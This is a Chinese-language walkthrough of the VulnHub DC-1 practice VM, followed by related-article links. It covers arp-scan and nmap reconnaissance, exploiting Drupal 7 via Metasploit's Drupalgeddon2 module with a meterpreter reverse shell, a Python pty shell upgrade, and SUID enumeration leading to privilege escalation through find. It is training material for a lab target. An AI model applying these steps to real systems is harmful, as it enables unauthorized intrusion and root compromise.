玩转靶机Vulnhub:DC1(详细)
靶机Vulnhub:DC1
靶机和环境准备:
主机发现:
信息收集:
发现并利用漏洞
SUID提权:
总结:
靶机和环境准备:
宿主机:kaili
dc1靶机下载:DC: 1 ~ VulnHub
主机发现:
arp-scan -l
发现靶机ip地址192.168.3.76
信息收集:
nmap -A -sV 192.168.3.76
发现是靶机开启了22,80,111这三个端口,http服务上搭建cms:drupal 版本是7
发现并利用漏洞
使用工具:msfconsole
加载payload
msf6 > search drupalMatching Modules
================ # Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution 1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection 2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection 3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code ExecutionInteract with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_evalmsf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
设置参数并进行漏洞利用
为了方便做个回显
python -c 'import pty;pty.spawn("/bin/bash")'\;
查找flag.txt,发现有个flag4查看其内容
www-data@DC-1:/var/www$ find / | grep flag
find / | grep flag
/home/flag4
/home/flag4/.bash_logout
/home/flag4/.profile
/home/flag4/flag4.txt
/home/flag4/.bash_history
/home/flag4/.bashrc
/var/www/flag1.txt
内容如下:(似乎好像没啥用)
www-data@DC-1:/var/www$ cat /home/flag4/flag4.txt
cat /home/flag4/flag4.txt
Can you use this same method to find or access the flag in root?Probably. But perhaps it's not that easy. Or maybe it is?
SUID提权:
继续正常步骤使用,发现flag4的提示中有个find这里有root权限的也有find是不是能用find提权呢?
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
www-data@DC-1:/var/www$ find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
<d / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 88744 Dec 10 2012 /bin/mount
-rwsr-xr-x 1 root root 31104 Apr 13 2011 /bin/ping
-rwsr-xr-x 1 root root 35200 Feb 27 2017 /bin/su
-rwsr-xr-x 1 root root 35252 Apr 13 2011 /bin/ping6
-rwsr-xr-x 1 root root 67704 Dec 10 2012 /bin/umount
-rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at
-rwsr-xr-x 1 root root 35892 Feb 27 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45396 Feb 27 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 30880 Feb 27 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44564 Feb 27 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 66196 Feb 27 2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find
-rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 9660 Jun 20 2017 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 248036 Jan 27 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5412 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 321692 Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 84532 May 22 2013 /sbin/mount.nfs
还真是能用find继续提权
查看最后的flag.txt
总结:
1.dc1这个靶机难度比较简单入门级别,适合新手刷,能熟悉渗透的流程
2.信息收集对整个渗透过程来说尤其重要,端口扫描和网站指纹的收集
3.msfconsole 的熟悉使用,对漏洞的查找和利用有一点的要求
4.了解suid提权的find提权的使用
玩转靶机Vulnhub:DC1(详细)相关推荐
- 看完这篇 教你玩转渗透测试靶机vulnhub——DC1
Vulnhub靶机DC1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:漏洞利用: ④:S ...
- VulnHub DC1靶机渗透测试
1. 说明 虚拟机环境为VM VirtualBox2. 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机:DC1 攻击机:kali 攻击目标:5个fl ...
- 靶机DC-8(详细渗透,适合新手渗透)
目录 靶机DC-8 (详细渗透,适合新手渗透) 0x01靶机描述 0x02环境搭建 1. 下载并导入靶机 2. 查看网络适配器 3. 启动靶机 0x03靶机渗透 一. 信息收集 1. 主机发现 2. ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——DC9
Vulnhub靶机DC9渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SQL注入: ③:文件包含: ④: ...
- Vulnhub靶机:DC-7渗透详细过程
DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础 ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——DC3
Vulnhub靶机DC3渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:SQL注入: ④: ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Vulnhub靶机DC7渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SSH登入: ③:漏洞发现与利用: ...
- Vulnhub靶机:DC-3渗透详细过程
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试 ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2
Vulnhub靶机My File Server: 2渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:FTP ...
最新文章
- 【数论基础】有关素数的基础算法(内含三种筛法,低至O(N^(2/3))!)
- 字符串表达式求值 C#实现
- C#高级编程 第十五章 反射
- 翻译spring4.2官方文档(3)
- 机器学习发展历史回顾
- 【Feign请求头丢失问题】no suitable HttpMessageConverter found for response type
- mysql 同义词_在数据库mysql中存储和检索同义词的最佳方法
- 关于结婚照,还不如PS去~
- 精玉PC技术GHOSTXP_SP3纯净版V10_祥和版
- RichTextBox 增加行间距
- 你被优衣库遭到******与英特尔漏洞刷屏了吗?
- 河南新华计算机学校学费多少,河南新华电脑学院提前三年收费 育人还是圈钱?...
- 湖南工业大学教务系统爬虫(课表获取篇)
- ②(常识篇)、《史上最全iOS八股文面试题》2022年,金三银四我为你准备了,iOS《1000条》笔试题以及面试题(包含答案)。带面试你过关斩将,(赶紧过来背iOS八股文)
- Intellij IDEA安装golang插件
- Zabbix 整合ldap认证
- 施努卡:什么叫机器视觉(机器视觉的重要意义是什么)
- 仿B站web,APP,后台
- 银行交换机服务器维护,某银行客户使用第三方网管纳管华为S7706交换机后网管时断时续的问题...
- 浅谈 language server LSIF SARIF Babelfish Semantic Tree-sitter Kythe Glean等
热门文章
- 骑着大鱼吃小鱼游戏3D版源码
- php订单下单支付流程,小程序的下单与支付的业务流程
- 为什么写入ReplicatedMergeTree引擎表里的数据少了?
- 【Algorithm】 Reservoir Sampling Shuffle an Array
- 硬件设计6---什么是滞回电路
- c语言中mustbe()什么意思,must是什么意思
- Unity中显示中文属性(汉化你的Inspector)
- 题目:L2-031 深入虎穴 (25 分)
- 男生想跟女生说的30句真心话!!!!
- matlab中零向量,在MATLAB中的向量中的非零元素之间插入可变数量的零